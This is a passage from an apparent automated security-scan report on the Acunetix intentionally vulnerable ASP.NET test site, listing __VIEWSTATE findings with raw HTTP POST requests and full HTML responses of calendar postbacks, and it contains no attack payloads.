align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8296&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBA2roImdoIZGRkjaw0ujs2tzIknTvXhyHo%2BVNg1iU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKSlOPXAgLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAk%2FnSiejc3xjYqNqxWNbwHQyfuh7
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:38:07 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBA2roImdoIZGRkjaw0ujs2tzIknTvXhyHo+VNg1iU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKSlOPXAgLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAk/nSiejc3xjYqNqxWNbwHQyfuh7" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:White" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8284&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBA5b2aj9oIZGRkvrO%2BHFqU2CWkVz2z3B3a8euhut0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKpoLm7AQLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAqegpNL0bFI3lz8XFS9gL7XkK0%2Bn
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:03:10 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBA5b2aj9oIZGRkvrO+HFqU2CWkVz2z3B3a8euhut0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpoLm7AQLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAqegpNL0bFI3lz8XFS9gL7XkK0+n" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:White" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" 